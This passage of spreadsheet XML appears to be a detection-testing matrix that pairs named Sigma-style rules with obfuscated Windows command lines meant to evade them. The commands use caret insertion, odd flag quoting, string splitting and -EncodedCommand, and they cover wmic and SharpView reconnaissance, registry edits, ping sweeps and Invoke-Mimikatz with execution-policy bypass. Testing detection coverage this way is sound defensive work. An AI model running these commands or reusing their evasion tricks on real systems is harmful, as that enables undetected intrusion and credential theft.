    <row r="102" ht="15.75" customHeight="1" s="42">
      <c r="A102" s="36" t="n"/>
      <c r="B102" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C102" s="36" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D102" s="36" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E102" s="36" t="inlineStr">
        <is>
          <t>wmic.exe logicaldisk where "DriveType=3" get Name,Size,FreeSpace</t>
        </is>
      </c>
      <c r="F102" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G102" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H102" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I102" s="43" t="n"/>
      <c r="J102" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K102" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="36" t="n"/>
      <c r="B103" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C103" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D103" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E103" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F103" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G103" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H103" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I103" s="43" t="n"/>
      <c r="J103" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K103" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="104" ht="15.75" customHeight="1" s="42">
      <c r="A104" s="36" t="n"/>
      <c r="B104" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C104" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D104" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E104" s="36" t="inlineStr">
        <is>
          <t>powershell -Nop -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F104" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G104" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H104" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I104" s="43" t="n"/>
      <c r="J104" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K104" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="36" t="n"/>
      <c r="B105" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C105" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D105" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E105" s="36" t="inlineStr">
        <is>
          <t>powershell /"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F105" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G105" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H105" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I105" s="43" t="n"/>
      <c r="J105" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K105" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="36" t="n"/>
      <c r="B106" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C106" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D106" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E106" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F106" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G106" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H106" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I106" s="43" t="n"/>
      <c r="J106" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K106" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="107" ht="15.75" customHeight="1" s="42">
      <c r="A107" s="36" t="n"/>
      <c r="B107" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C107" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D107" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E107" s="36" t="inlineStr">
        <is>
          <t>powershell -"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F107" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G107" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H107" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I107" s="43" t="n"/>
      <c r="J107" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K107" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="108" ht="15.75" customHeight="1" s="42">
      <c r="A108" s="36" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B108" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C108" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D108" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E108" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy SharpView.exe sv_update.exe &amp; sv_update.exe G^et-Doma^inComputer"</t>
        </is>
      </c>
      <c r="F108" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G108" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H108" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I108" s="43" t="n"/>
      <c r="J108" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K108" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="109" ht="15.75" customHeight="1" s="42">
      <c r="A109" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B109" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C109" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D109" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E109" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" /"ExecutionPolicy" Bypass -cOmmAND "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F109" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G109" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H109" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I109" s="43" t="n"/>
      <c r="J109" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K109" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="110" ht="15.75" customHeight="1" s="42">
      <c r="A110" s="36" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B110" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C110" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D110" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E110" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop -ExeCUTIONPOLICY Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F110" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G110" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H110" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I110" s="43" t="n"/>
      <c r="J110" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K110" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="111" ht="15.75" customHeight="1" s="42">
      <c r="A111" s="36" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B111" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C111" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D111" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E111" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -EXeCutIONPOlIcY Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F111" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G111" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H111" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I111" s="43" t="n"/>
      <c r="J111" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K111" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="36" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B112" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C112" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D112" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E112" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noPrOFilE -"ExecutionPolicy" Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F112" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G112" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H112" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I112" s="43" t="n"/>
      <c r="J112" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K112" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="113" ht="15.75" customHeight="1" s="42">
      <c r="A113" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B113" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C113" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D113" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E113" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROfILe -ep Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F113" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G113" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H113" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I113" s="43" t="n"/>
      <c r="J113" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K113" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="114" ht="15.75" customHeight="1" s="42">
      <c r="A114" s="36" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B114" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C114" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D114" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E114" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -eXecUTIoNpolicY Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F114" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G114" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H114" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I114" s="43" t="n"/>
      <c r="J114" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K114" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="36" t="n"/>
      <c r="B115" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C115" s="36" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D115" s="36" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E115" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "net.exe u^s^e"</t>
        </is>
      </c>
      <c r="F115" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G115" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H115" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I115" s="43" t="n"/>
      <c r="J115" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K115" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="116" ht="15.75" customHeight="1" s="42">
      <c r="A116" s="43" t="n"/>
      <c r="B116" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C116" s="36" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D116" s="36" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E116" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-SmbConnection"</t>
        </is>
      </c>
      <c r="F116" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G116" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H116" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I116" s="43" t="n"/>
      <c r="J116" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K116" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="117" ht="15.75" customHeight="1" s="42">
      <c r="A117" s="43" t="inlineStr">
        <is>
          <t>t1057</t>
        </is>
      </c>
      <c r="B117" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_pipe_output</t>
        </is>
      </c>
      <c r="C117" s="36" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE</t>
        </is>
      </c>
      <c r="D117" s="36" t="inlineStr">
        <is>
          <t>ccb5742c-c248-4982-8c5c-5571b9275ad3</t>
        </is>
      </c>
      <c r="E117" s="36" t="inlineStr">
        <is>
          <t>cmd /c "tasklist &gt; %temp%	.txt &amp;&amp; findstr powershell %temp%	.txt"</t>
        </is>
      </c>
      <c r="F117" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G117" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H117" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I117" s="36" t="n"/>
      <c r="J117" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K117" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="118" ht="15.75" customHeight="1" s="42">
      <c r="A118" s="43" t="inlineStr">
        <is>
          <t>t1057</t>
        </is>
      </c>
      <c r="B118" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_recon_pipe_output</t>
        </is>
      </c>
      <c r="C118" s="36" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE</t>
        </is>
      </c>
      <c r="D118" s="36" t="inlineStr">
        <is>
          <t>ccb5742c-c248-4982-8c5c-5571b9275ad3</t>
        </is>
      </c>
      <c r="E118" s="36" t="inlineStr">
        <is>
          <t>cmd /c "tasklist |; findstr powershell"</t>
        </is>
      </c>
      <c r="F118" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G118" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H118" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I118" s="43" t="n"/>
      <c r="J118" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K118" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="119" ht="15.75" customHeight="1" s="42">
      <c r="A119" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B119" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_scan_loop</t>
        </is>
      </c>
      <c r="C119" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scan Loop Network</t>
        </is>
      </c>
      <c r="D119" s="36" t="inlineStr">
        <is>
          <t>f8ad2e2c-40b6-4117-84d7-20b89896ab23</t>
        </is>
      </c>
      <c r="E119" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "f^o^r /L %i in (1,1,254) do p^i^n^g -n 1 192.168.1.%i"</t>
        </is>
      </c>
      <c r="F119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I119" s="36" t="n"/>
      <c r="J119" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K119" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="120" ht="15.75" customHeight="1" s="42">
      <c r="A120" s="43" t="n"/>
      <c r="B120" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C120" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D120" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E120" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F120" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G120" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H120" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I120" s="43" t="n"/>
      <c r="J120" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K120" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="121" ht="15.75" customHeight="1" s="42">
      <c r="A121" s="43" t="n"/>
      <c r="B121" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C121" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D121" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E121" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F121" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G121" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H121" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I121" s="36" t="n"/>
      <c r="J121" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K121" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="122" ht="15.75" customHeight="1" s="42">
      <c r="A122" s="43" t="n"/>
      <c r="B122" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C122" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D122" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E122" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F122" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G122" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H122" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I122" s="43" t="n"/>
      <c r="J122" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K122" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="123" ht="15.75" customHeight="1" s="42">
      <c r="A123" s="43" t="n"/>
      <c r="B123" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C123" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D123" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E123" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F123" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G123" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H123" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I123" s="43" t="n"/>
      <c r="J123" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K123" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="124" ht="15.75" customHeight="1" s="42">
      <c r="A124" s="43" t="n"/>
      <c r="B124" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C124" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D124" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E124" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F124" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G124" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H124" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I124" s="36" t="n"/>
      <c r="J124" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K124" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="125" ht="15.75" customHeight="1" s="42">
      <c r="A125" s="43" t="n"/>
      <c r="B125" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C125" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D125" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E125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125" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G125" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H125" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I125" s="36" t="n"/>
      <c r="J125" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K125" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="126" ht="15.75" customHeight="1" s="42">
      <c r="A126" s="43" t="n"/>
      <c r="B126" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C126" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D126" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E126" s="36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126" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G126" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H126" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I126" s="36" t="n"/>
      <c r="J126" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K126" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="127" ht="15.75" customHeight="1" s="42">
      <c r="A127" s="43" t="n"/>
      <c r="B127" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C127" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D127" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E127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127" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G127" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H127" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I127" s="43" t="n"/>
      <c r="J127" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K127" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="128" ht="15.75" customHeight="1" s="42">
      <c r="A128" s="43" t="n"/>
      <c r="B128" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C128" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D128" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E128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128" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G128" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H128" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I128" s="36" t="n"/>
      <c r="J128" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K128" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="129" ht="15.75" customHeight="1" s="42">
      <c r="A129" s="43" t="n"/>
      <c r="B129" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C129" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D129" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E129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129" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G129" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H129" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I129" s="36" t="n"/>
      <c r="J129" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K129" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="130" ht="15.75" customHeight="1" s="42">
      <c r="A130" s="43" t="n"/>
      <c r="B130" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C130" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D130" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E130" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F130" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G130" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H130" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I130" s="36" t="n"/>
      <c r="J130" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K130" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="43" t="n"/>
      <c r="B131" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C131" s="36" t="inlineStr">
        <is>
